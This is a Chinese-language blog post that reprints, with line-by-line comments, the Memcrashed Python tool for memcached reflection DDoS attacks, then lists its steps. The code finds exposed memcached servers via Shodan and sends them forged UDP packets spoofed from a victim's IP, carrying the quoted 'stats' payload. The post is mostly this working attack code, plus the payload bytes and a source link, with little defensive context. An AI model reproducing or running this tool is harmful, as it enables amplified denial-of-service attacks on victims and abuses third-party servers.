0x00 前言:
距离世界上最大的 Drdos 攻击已经过去了两个星期左右
昨天在交流的时候群友在 Github 中找到了 exploit
0x01 开始:
- #-- coding: utf8 --
- #!/usr/bin/env python3
- import sys, os, time, shodan #导入 sys,shodan,os,time 模块
- from pathlib import Path #从 pathlib 模块中导入 Path
- from scapy.all import * #导入 scapy
- from contextlib import contextmanager, redirect_stdout #从 contextlib 模块中导入 contextmanager, redirect_stdout
- starttime = time.time() #设置时间点
- @contextmanager
- def suppress_stdout():
- with open(os.devnull, "w") as devnull: #不同设备下的 null 路径
- with redirect_stdout(devnull):
- yield
- class color:
- HEADER = '\033[0m' #背景颜色字符串
- keys = Path("./api.txt") #搜索 API.txt
- logo = color.HEADER + ''' #好看的标题
- Author: @037
- Version: 3.2
- ####################################### DISCLAIMER ########################################
- | Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
- | memcached servers. It then allows you to use the same servers to launch widespread |
- | distributed denial of service attacks by forging UDP packets sourced to your victim. |
- | Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
- | is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
- | I am NOT responsible for any damages caused or any crimes committed by using this tool. |
- ###########################################################################################
- '''
- print(logo) #输出好看的标题 = =
- if keys.is_file(): #如果路径下有这个文件的话
- with open('api.txt', 'r') as file: #读取 API.txt
- SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符
- else: #如果没有这个文件
- file = open('api.txt', 'w') #新建 API.txt
- SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key:') #等待用户输入
- file.write(SHODAN_API_KEY) #写入用户输入的东西
- print('[~] File written: ./api.txt') #这个就不说了 = =
- file.close() #关闭文件
- while True:
- api = shodan.Shodan(SHODAN_API_KEY) #你的 shodan Key
- print('') #= =
- try:
- myresults = Path("./bots.txt") #搜索 bots.txt
- query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>:").lower() #等待用户输入, 将输入转化为小写
- if query.startswith('y'): #如果用户输入的是 y
- print('')
- print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
- results = api.search('product:"Memcached"port:11211') #从 shodan 中搜索 Memcached 服务, 并且端口是 11211 的
- print('[] API Key Authentication: SUCCESS')
- print('[~] Number of bots: %s' % results['total'])
- print('')
- saveresult = input("[*] Save results for later usage? <Y/n>:").lower() #等待用户输入, 将输入转化为小写
- if saveresult.startswith('y'): #如果是 y
- file2 = open('bots.txt', 'a') #打开 bots.txt
- for result in results['matches']: #变量 shodan 搜索到的结果
- file2.write(result['ip_str'] + "\n") #将搜索到的 IP 写入 bots.txt
- print('[~] File written: ./bots.txt')
- print('')
- file2.close() #关闭文件
- saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>:').lower() #等待用户输入将输入的转为小写
- if myresults.is_file(): #如果路径下有 bots.txt
- if saveme.startswith('y'): #用户输入为 y
- with open('bots.txt') as my_file: #读取 bots.txt
- ip_array = [line.rstrip() for line in my_file] #读取 IP
- else: #如果路径下没有这个 txt
- print('')
- print('[] Error: No bots stored locally, bots.txt file not found!')
- print('')
- if saveme.startswith('y') or query.startswith('y'): #两个任意一个为 y 的话
- print('')
- target = input("[] Enter target IP address:") #等待用户输入
- power = int(input("[] Enter preferred power (Default 1):") or "1")
- data = input("[] Enter payload contained inside packet:") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
- print('')
- if query.startswith('y'): #如果输入为 y 的话
- iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>:').lower() #等待输入
- if iplist.startswith('y'): #输入为 y 的话
- print('')
- counter= int(0)
- for result in results['matches']: #遍历 shodan 搜索的结果
- host = api.host('%s' % result['ip_str']) #输入 IP
- counter=counter+1
- print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
- time.sleep(1.1 - ((time.time() - starttime) % 1.1))
- if saveme.startswith('y'): #为 y 的话
- iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>:').lower() #等待输入
- if iplistlocal.startswith('y'): #输入为 y 的话
- print('')
- counter= int(0)
- for x in ip_array:
- host = api.host('%s' % x)
- counter=counter+1
- print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
- time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟, 并减去开始的时间
- print('')
- engage = input('[*] Ready to engage target %s? <Y/n>:' % target).lower() #等待用户输入
- if engage.startswith('y'): #如果为 y
- if saveme.startswith('y'): #如果为 y
- for i in ip_array: #遍历 ip_array
- if power>1: #如果 power 大于 1
- print('[+] Sending %d forged UDP packets to: %s' % (power, i))
- with suppress_stdout():
- send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
- elif power==1:# 如果 power 等于 1
- print('[+] Sending 1 forged UDP packet to: %s' % i)
- with suppress_stdout():
- send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 向 Memcrashed 发送数据
- else: #如果两个都不是
- for result in results['matches']:
- if power>1: #如果 power 大于 1
- print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
- with suppress_stdout():
- send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 发送数据
- elif power==1: #如果 power 等于 1
- print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
- with suppress_stdout():
- send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源 IP 发送数据
- print('')
- print('[] Task complete! Exiting Platform. Have a wonderful day.')
- break
- else:
- print('')
- print('[] Error: %s not engaged!' % target)
- print('[~] Restarting Platform! Please wait.')
- print('')
- else:
- print('')
- print('[] Error: No bots stored locally or remotely on Shodan!')
- print('[~] Restarting Platform! Please wait.')
- print('')
- except shodan.APIError as e:
- print('[] Error: %s' % e)
- option = input('[*] Would you like to change API Key? <Y/n>:').lower() #等待输入
- if option.startswith('y'): #如果为 y
- file = open('api.txt', 'w') #新建 api.txt
- SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key:') #输入您的 shodan 可以
- file.write(SHODAN_API_KEY) #加入到文件
- print('[~] File written: ./api.txt')
- file.close() #关闭文件
- print('[~] Restarting Platform! Please wait.')
- print('')
- else: #如果不是
- print('')
- print('[] Exiting Platform. Have a wonderful day.')
- break
向 Memcrashed 发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
Memcrashed exploit 地址: https://github.com/649/Memcrashed-DDoS-Exploit
0x02 分析完代码获取到的思路:
1. 从 shodan 中获取开放了 11211 的 Memcrashed 的服务的 IP
2. 遍历 shodana 获取到的 IP 写入到文件
3. 遍历写人 IP 的文件
4. 伪造源 IP 向遍历的 IP 发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
来源: https://www.cnblogs.com/haq5201314/p/8594595.html